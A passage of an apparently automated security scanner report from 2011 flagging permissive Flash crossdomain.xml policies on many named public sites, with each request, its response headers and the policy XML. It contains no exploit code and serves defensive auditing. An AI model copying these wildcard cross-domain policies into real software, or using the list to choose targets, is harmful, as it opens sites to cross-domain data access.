Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chow.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 13 Jul 2009 20:41:54 GMT
Accept-Ranges: bytes
Content-Length: 476
nnCoection: close
Content-Type: application/xml
Cache-Control: max-age=28278968
Expires: Thu, 23 Feb 2012 20:49:12 GMT
Date: Sat, 02 Apr 2011 13:33:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.com.com"/>
   <allow-access-from domain="*.chow.com"/>
   <allow-access-from domain="*.gamespot.com"/>
   <allow-access-from domain="*.cbsig.net"/>
   <allow-access-from domain="*.cbs.com"/>
   <allow-access-from domain="*.cnet.cnwk"/>
   <allow-access-from domain="*.cnet.com"/>
...[SNIP]...

7.210. http://www.chron.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chron.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chron.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
Last-Modified: Thu, 31 Mar 2011 00:53:27 GMT
ETag: "16d-49fbcb89fefc0"
Accept-Ranges: bytes
Content-Length: 365
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADM DEVa TAIa PSAa PSDa CONo OUR DELo IND PHY ONL INT STA DEM UNI COM NAV"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:34:22 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.chron.com" />
<allow-access-from domain="chron.com" />
<allow-access-from domain="*.houstonchronicle.com" />
<allow-access-from domain="houstonchronicle.com" />
...[SNIP]...

7.211. http://www.cisco.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cisco.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cisco.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0
Last-Modified: Mon, 14 Mar 2011 21:47:58 GMT
ETag: "43d2df80"
Accept-Ranges: bytes
Content-Length: 454
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:38:17 GMT
CDCHOST: ccows-sj-202
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:39:20 GMT
Connection: close
Set-Cookie: CP_GUTC=72.163.4.165.1301751497878302; path=/; expires=Wed, 26-Mar-36 13:38:17 GMT; domain=.cisco.com

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.cisco.com -->
<cross-domain-poli
...[SNIP]...
<allow-access-from domain="*.cisco.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.static-cisco.com" />
   <allow-access-from domain="*.ogilvy.edgesuite.net" />
...[SNIP]...

7.212. http://www.classmates.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.classmates.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.classmates.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:30 GMT
Server: Apache
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CON HIS OTPi OUR DELi SAMi PUBi IND OTC"
Last-Modified: Wed, 23 Feb 2011 19:33:22 GMT
ETag: "1df-4d656102"
Accept-Ranges: bytes
Content-Length: 479
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!-- Version: $Id: crossdomain.xml,v 1.4 2007-07-19 02:25:13 rrufh Exp $ -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*.untd.com" />
<allow-access-from domain="*.cmates.com" />
<allow-access-from domain="*.classmates.com" />
<allow-access-from domain="*.cmcdn.com" />
<allow-access-from domain="*.cmatescdn.com" />
...[SNIP]...

7.213. http://www.clocklink.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clocklink.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clocklink.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 18 Mar 2011 13:51:58 GMT
ETag: "6600b4a-10b-49ec214e15b80"
Accept-Ranges: bytes
Content-Length: 267
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.mysite.com -->
<cross-domain-policy>
   <allow-access-from domain="*.clocklink.com" />
...[SNIP]...

7.214. http://www.clubpenguin.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clubpenguin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clubpenguin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Apr 2008 01:09:24 GMT
ETag: "2005b-17c-44adf0d0d9900"
Accept-Ranges: bytes
Content-Length: 380
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.clubpenguin.com" />
<allow-access-from domain="*.critteroo.com" />
<allow-access-from domain="*.critteroo.co.uk" />
<allow-access-from domain="*.clubpenguin.co.uk" />
...[SNIP]...

7.215. http://www.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:24:55 GMT
Via: 1.1 C aicache6
Content-Length: 3794
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Sat, 02 Apr 2011 13:25:55 GMT

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
...[SNIP]...
<allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
...[SNIP]...

7.216. http://www.cnet.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:05 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Length: 3257
Keep-Alive: timeout=15, max=988
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.pluggd.com"/>
<allow-access-from domain="*.userplane.com"/>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.motifcdn2.doubleclick.net"/>
<allow-access-from domain="*.juegasgroup.com"/>
...[SNIP]...

7.217. http://www.cnn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnn.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:16 GMT
Server: Apache
Set-Cookie: CG=US:TX:Dallas; path=/
Last-Modified: Fri, 03 Dec 2010 21:00:13 GMT
Accept-Ranges: bytes
Content-Length: 2326
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 13:37:32 GMT
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.cnn.com"/>
   <allow-access-from domain="*.turner.com"/>
   <allow-access-from domain="*.cnn.net"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
   <allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="*.2mdn.net"/>
   <allow-access-from domain="*.i-traffic.com"/>
   <allow-access-from domain="ar.atwola.com"/>
   <allow-access-from domain="*.itraffic.com"/>
   <allow-access-from domain="*.agency.com"/>        
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.time.com"/>
   <allow-access-from domain="*.VillageVoice.com"/>
   <allow-access-from domain="*.nymag.com"/>
   <allow-access-from domain="*.salon.com"/>    
   <allow-access-from domain="*.secondthought.com"/>    
   <allow-access-from domain="*.clk4.com"/>
   <allow-access-from domain="servedby.advertising.com"/>
   <allow-access-from domain="bannerfarm.advertising.com"/>
   <allow-access-from domain="*.advertising.com"/>
   <allow-access-from domain="*.crewintegrated.com"/>
   <allow-access-from domain="gfx.klipmart.com"/>
   <allow-access-from domain="*.klipmart.com"/>
   <allow-access-from domain="*.cnnexpansion.com"/>
   <allow-access-from domain="mediacache.travelzoo.com"/>
   <allow-access-from domain="*.cdn.turner.com"/>    
   <allow-access-from domain="staging.barbariangroup.com"/>
   <allow-access-from domain="*.spreadomat.net"/>
   <allow-access-from domain="CNNShirts.spreadshirt.com"/>        
   <allow-access-from domain="72.3.226.28"/>
   <allow-access-from domain="isg-marketing.com"/>
   <allow-access-from domain="*.isg-marketing.com"/>
   <allow-access-from domain="*isgwidgets.s3.amazonaws.com"/>    
   <allow-access-from domain="*.oprah.com"/>
   <allow-access-from domain="zuse.networld.at"/>
   <allow-access-from domain="*.fusebox.com"/>
   <allow-access-from domain="*.cnnpromos.com"/>        
<allow-access-from domain="*.rtm.com"/>
<allow-access-from domain="*.rtmweb.rtm.com"/>    
<allow-access-from domain="*.stamen.com"/>        
<allow-access-from domain="*.prizelogic.com"/>
...[SNIP]...

7.218. http://www.cobaltnitra.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cobaltnitra.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cobaltnitra.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:36 GMT
Server: Apache/2.2.3 (Oracle) DAV/2 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: click_tracker=10.64.64.6.1301752596078381; path=/; expires=Mon, 01-Apr-13 13:56:36 GMT
Last-Modified: Wed, 01 Sep 2010 15:08:22 GMT
ETag: "1d7206-263-48f3411876580"
Accept-Ranges: bytes
Content-Length: 611
Content-Type: text/xml
Set-Cookie: BIGipServernitra.staticweb=570966026.20480.0000; path=/
X-Cache: MISS from backend02-1
X-Cache-Lookup: MISS from backend02-1:4001
X-Cache: MISS from frontend02
X-Cache-Lookup: MISS from frontend02:3128
Via: 1.0 backend02-1 (squid), 1.0 frontend02 (squid)
Proxy-Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.cobaltnitra.com" />
   <allow-access-from domain="*.motorplace.com" />
   <allow-access-from domain="*.cobaltgroup.com" />
   <allow-access-from domain="*.cobaltmotors1.com" />
   <allow-access-from domain="*.webedge.com" />
   <allow-access-from domain="*.lexusdealer.com" />
   <allow-access-from domain="*.vwdealer.com" />
<allow-access-from domain="*.cpbinteractive.com" />
<allow-access-from domain="*.vw.com" />
...[SNIP]...

7.219. http://www.collegeboard.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.collegeboard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegeboard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:02 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 19:40:23 GMT
ETag: "116-4870bbed717c0"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.collegeboard.com" />
<allow-access-from domain="*.collegeboard.org" />
...[SNIP]...

7.220. http://www.comcast.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.58 (Unix)
Last-Modified: Tue, 14 Sep 2010 01:19:26 GMT
ETag: "25d5d5-444-f82380"
Accept-Ranges: bytes
Content-Length: 1092
Content-Type: application/xml
Cache-Control: max-age=2592000
Date: Sat, 02 Apr 2011 12:37:55 GMT
Connection: close

<?xml version="1.0"?>

<!--static-->

<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.xfinity.com"/>
<allow-access-from domain="*.fancast.com"/>
<allow-access-from domain="beta.comcast.net" />
<allow-access-from domain="*.cimcontent.net" />
<allow-access-from domain="chrome.comcast.net" />
<allow-access-from domain="static.comcast.net" />
<allow-access-from domain="por-img.cimcontent.net" />
<allow-access-from domain="comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcastonline.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.att.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.xcal.tv" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.teamcomcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...

7.221. http://www.consumerreports.org/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.consumerreports.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.consumerreports.org

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise
Date: Sat, 02 Apr 2011 13:38:39 GMT
Content-type: application/rss+xml
Last-modified: Sat, 02 Apr 2011 12:37:52 GMT
Content-length: 661
Accept-ranges: bytes
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.consumerreports.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.consumer.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...

7.222. http://www.consumersearch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.consumersearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.consumersearch.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix) PHP/5.2.6 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.6
X-Drupal-Cache: MISS
Last-Modified: Sat, 02 Apr 2011 13:33:51 +0000
ETag: "1301751231"-gzip
nnCoection: close
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:33:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:51 GMT
Content-Length: 597
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.consumersearch.com" />

...[SNIP]...
<allow-access-from domain="*.www.consumersearch.com" />
<allow-access-from domain="cs6.peter" />
<allow-access-from domain="*.cs6.peter" />
<allow-access-from domain="www2.comsumersearch.com" />
<allow-access-from domain="*.www2.comsumersearch.com" />
<allow-access-from domain="d62.consumersearch.com" />
<allow-access-from domain="*.d62.consumersearch.com" />
...[SNIP]...

7.223. http://www.costco.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.costco.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.costco.com

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:31 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 22:23:08 GMT
ETag: "02eecb696edcb1:2d96"
Content-Length: 161

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.costco.com" />
<allow-access-from domain="*.costco.ca" />
</cross-domain-policy>

7.224. http://www.dailyfinance.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:48 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 221
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*.aolcdn.com" />
   <allow-access-from domain="*.test.aol.com" />
<
...[SNIP]...

7.225. http://www.dailykos.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailykos.com
Path:   /crossdomain.xml

